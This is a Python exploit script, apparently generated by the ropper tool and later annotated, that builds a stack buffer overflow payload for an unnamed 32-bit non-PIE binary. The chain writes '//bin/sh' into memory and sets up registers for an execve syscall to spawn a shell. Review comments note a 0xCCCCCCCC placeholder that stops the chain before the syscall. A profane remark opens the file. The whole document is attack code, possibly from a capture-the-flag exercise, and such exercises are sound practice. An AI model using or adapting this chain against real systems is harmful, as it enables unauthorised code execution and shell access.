fuck you can add descriptions to this shit?
#!/usr/bin/env python
# Generated by ropper ropchain generator #
import sys
from struct import pack
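# Link-time base of the (non-PIE) 32-bit target; every gadget offset below is relative to it.
IMAGE_BASE_0 = 0x08048000

# Writable scratch area inside the target image used to build the execve argument block.
_SH_OFF = 0x000a6060    # 8 bytes: "//bi" + "n/sh"
_NULL_OFF = 0x000a6068  # 4 bytes: zeroed dword, reused as argv and envp


def p(x):
    """Pack *x* as a 32-bit little-endian unsigned int.

    The byte order is pinned with '<' because the chain targets 32-bit x86; the
    original pack('I', ...) used the host's native order, which only happens to
    be right on little-endian build machines.
    """
    return pack('<I', x)


def rebase_0(x):
    """Pack the absolute address of image offset *x* (rebased on IMAGE_BASE_0)."""
    return p(x + IMAGE_BASE_0)


def build_rop(image_base=IMAGE_BASE_0):
    """Return the full payload as bytes: stack padding followed by the ROP chain.

    The chain writes "//bin/sh" plus a zero dword into a writable region of the
    target image, loads ebx/ecx/edx for an i386 execve(2) call and sets eax to
    0xb (11, the i386 execve syscall number) via a neg trick.

    image_base: load address the gadget offsets are rebased against
                (default IMAGE_BASE_0). Passing a different base does not move
                the scratch writes, which also live inside the image.
    """
    def rebase(off):
        return p(off + image_base)

    # Distance from the overflowed buffer to the saved return address. Presumably a
    # 0x1000-byte buffer plus 0x20 of frame, minus 4 — TODO confirm against the target.
    padding = b"A" * ((0x1000 + 0x20) - 4)

    chain = [
        # -- write "//bi" at _SH_OFF --
        rebase(0x00076b26),  # pop eax; ret
        b"//bi",
        rebase(0x0002a70a),  # pop edx; ret
        rebase(_SH_OFF),
        rebase(0x00055ead),  # mov dword ptr [edx], eax; ret
        # -- write "n/sh" at _SH_OFF + 4 --
        rebase(0x00076b26),  # pop eax; ret
        b"n/sh",
        rebase(0x0002a70a),  # pop edx; ret
        rebase(_SH_OFF + 4),
        rebase(0x00055ead),  # mov dword ptr [edx], eax; ret
        # -- store a zero dword at _NULL_OFF: terminates the string and serves as argv/envp --
        rebase(0x00070b9f),  # xor eax, eax; ret  (zero without a literal NUL dword in the chain)
        rebase(0x0002a70a),  # pop edx; ret
        rebase(_NULL_OFF),
        rebase(0x00055ead),  # mov dword ptr [edx], eax; ret
        # -- execve register setup --
        # NOTE(review): offset 0x1d1 lies in the first page of the image; confirm the
        # "pop ebx; ret" bytes really exist there before relying on it.
        rebase(0x000001d1),  # pop ebx; ret   -> ebx = path
        rebase(_SH_OFF),
        rebase(0x0002a731),  # pop ecx; pop edx; ret  (hand-patched gadget per the original author)
        rebase(_NULL_OFF),   # ecx = argv -> zero dword
        rebase(_SH_OFF),     # filler consumed by the second pop; edx is reloaded right after
        rebase(0x0002a70a),  # pop edx; ret
        rebase(_NULL_OFF),   # edx = envp -> zero dword
        # -- eax = 0xb: 0 - 0xfffffff5 wraps to 0x0000000b, presumably chosen to avoid NUL bytes --
        rebase(0x00076b26),  # pop eax; ret
        p(0xfffffff5),
        rebase(0x0001a1f7),  # neg eax; ret
        # NOTE(review): 0xCCCCCCCC is not rebased and is not an address in the image; the
        # "ret" after neg eax lands on it, so the process faults (or hits int3 under a
        # debugger) and the final gadget below is never reached. This looks like a debug
        # placeholder where the syscall gadget belongs — remove it before real use.
        b"\xCC\xCC\xCC\xCC",
        rebase(0x0002add0),  # presumably the int 0x80 gadget; unreachable while the 0xCC placeholder stays
    ]
    return padding + b"".join(chain)


rop = build_rop()

if __name__ == "__main__":
    # Emit raw bytes (print(rop) on a bytes object would write its repr and corrupt
    # the payload). The trailing newline mirrors what the Python 2 print statement sent.
    sys.stdout.buffer.write(rop + b"\n")
    sys.stdout.buffer.flush()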